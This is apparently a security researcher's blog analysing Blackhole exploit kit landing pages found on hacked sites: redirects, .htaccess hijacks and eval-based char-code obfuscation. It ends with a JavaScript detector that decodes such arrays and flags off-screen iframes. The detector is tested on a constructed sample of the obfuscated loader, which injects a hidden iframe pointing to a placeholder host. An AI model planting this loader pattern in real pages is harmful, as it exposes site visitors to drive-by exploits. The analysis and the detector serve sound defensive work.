Category: Blackhole


Yesterday, Polonus addressed the issue on the avast! forums. Let’s check out the inform.htm.

First, review the VirusTotal results.

The malicious code is as follows:

inform.htm

As you can see, there is no obfuscation. They aren’t trying to hide anything; maybe they are trying to reduce generic AV detection. The script looks simple enough, with a redirect to this podarunoki(dot)ru site…

Now we will look at two urlQuery references: here and here.

Both of these sites, including the one given in the picture above, lead to .ru domains with :8080.

You can check for new malicious inform.htm sites on CleanMX.
~!Donovan

A user reported on the avast! forums that another site had been found infected with the Blackhole Exploit. Confirmed with urlQuery and Sucuri; researching the Blackhole site, Google says it has infected over 23 sites while Sucuri says it’s been used for redirection.

So, just how many scanners will detect this (Besides urlQuery and Sucuri of course)?

Interesting,
~!Donovan

Blackhole Exploit Please Wait Page

Today, Polonus reported 2 Blackhole exploit sites here. Let’s examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, which fails, so execution falls through to the catch block. We see the usual zxc in the catch statement that many Blackhole variants use. It defines n as an array of numbers, then loops through it, appending each value to s with fromCharCode(). Then two if statements, which will return true 99.9% of the time, tell the browser to run the s string as JavaScript code (using eval).

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1, with a few differences. Variant 2 tries to define a variable as eval’s prototype. The second if statement featured in Variant 1 is also not present.

Both of these scripts deobfuscate to an iframe pointing to a Blackhole exploit hotspot. Both files are named mail.htm. Searching on CleanMX reveals that there are others out there. Here is an example VirusTotal result. Only 2 detect.

Be prepared,
~!Donovan

Zappier Technology Homepage

Yesterday, this outdated WordPress site was hacked. The webmaster took the immediate action required: posting the information to the public. He reported the issue on the WordPress forum and the avast! community forum. He also asked for help at StackOverflow, but the question was removed. Google Cache saves us in this case. Let’s check some of the links our friend Pondus provided us. Sucuri SiteCheck tells us that the main site contains a redirect using the .htaccess file. A similar .htaccess hack was mentioned here. Various Blackhole exploit malware is also present in case the redirect is cleared. urlQuery returns ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3 and SPECIFIC-THREATS Blackhole landing page with specific structure – prototype catch, with a severity of 1. Let’s see why.

Zappier Technology JavaScript frmAdd() Function

Oh, nothing more than the typical hidden iframe that the BlackHole Exploit Kit uses. By setting the top and left CSS rules of the iframe to -999em, it is placed out of the user’s sight. This avoids detection by scanners that only search for a low height and/or width. It leads to the BlackHole Exploit Hotspot, ’Miami Tickets’. However, HostGator noticed the malicious activity and closed the site. The user has yet to change the .htaccess rules, so the redirect to MercuryTutors is still there. Sucuri caught this behavior.
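As an added example (not code from this post or from any of the sites discussed), the following JavaScript decodes the char-code array pattern seen in both mail.htm variants without ever executing it, then checks the result for the off-screen iframe trick used by frmAdd(). The sample script, the example.invalid host and the size/offset thresholds are constructed assumptions.

```javascript
// Added example, not the post's code: decode the "numeric array -> String.fromCharCode
// -> eval" pattern statically (never eval), then look for iframes hidden by size or position.
const MIN_ARRAY_LEN = 16; // short numeric arrays are rarely payloads
// Turn every plausible char-code array literal in a script into text.
function decodeCharCodeArrays(script) {
  const out = [];
  const arrayRe = /\[\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\]/g;
  for (let m; (m = arrayRe.exec(script)) !== null;) {
    const codes = m[1].split(',').map((x) => parseInt(x.trim(), 10));
    if (codes.length < MIN_ARRAY_LEN || codes.some((c) => c < 9 || c > 255)) continue;
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Flag iframes hidden by tiny width/height, by CSS, or by a large negative
// top/left offset (the -999em trick that size-only scanners miss).
function findHiddenIframes(html) {
  const hits = [];
  const attr = (tag, name) =>
    (new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, 'i').exec(tag) || [])[1];
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const reasons = [];
    const w = parseInt(attr(tag, 'width'), 10), h = parseInt(attr(tag, 'height'), 10);
    if ((!isNaN(w) && w <= 2) || (!isNaN(h) && h <= 2)) reasons.push('tiny-size');
    const style = (/\bstyle\s*=\s*["']([^"']*)["']/i.exec(tag) || [])[1] || '';
    const off = /\b(top|left|margin-top|margin-left)\s*:\s*-(\d+)(px|em|%)/gi;
    for (let d; (d = off.exec(style)) !== null;) {
      const n = parseInt(d[2], 10); // thresholds are assumptions, tune per site
      if ((d[3] === 'em' && n >= 50) || (d[3] === 'px' && n >= 1000) || (d[3] === '%' && n >= 100))
        reasons.push(`off-screen:${d[1]}:-${n}${d[3]}`);
    }
    if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(style)) reasons.push('css-hidden');
    if (reasons.length) hits.push({ tag, reasons });
  }
  return hits;
}

// Constructed sample in the shape the post describes: try/catch(zxc), a numeric array,
// a fromCharCode loop, then eval. Payload: an iframe to a placeholder :8080 host at -999em.
const PAYLOAD = '<iframe src="http://example.invalid:8080/" width="100" height="100" ' +
  'style="position:absolute;top:-999em;left:-999em"></iframe>';
const CODES = Array.from(PAYLOAD, (c) => c.charCodeAt(0));
const SAMPLE = 'try{n^=eval;}catch(zxc){n=[' + CODES.join(',') +
  '];s="";for(i=0;i<n.length;i++){s+=String.fromCharCode(n[i]);}if(s)eval(s);}';
// Decode each payload statically, then inspect it for hidden iframes.
function analyse(script) {
  return decodeCharCodeArrays(script).map((text) => ({ text, hidden: findHiddenIframes(text) }));
}
console.log(JSON.stringify(analyse(SAMPLE), null, 2));
```

Run with node; the decoded payload is reported with off-screen:top and off-screen:left reasons, which a height/width-only heuristic would not raise.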

Stay Safe,
~!Donovan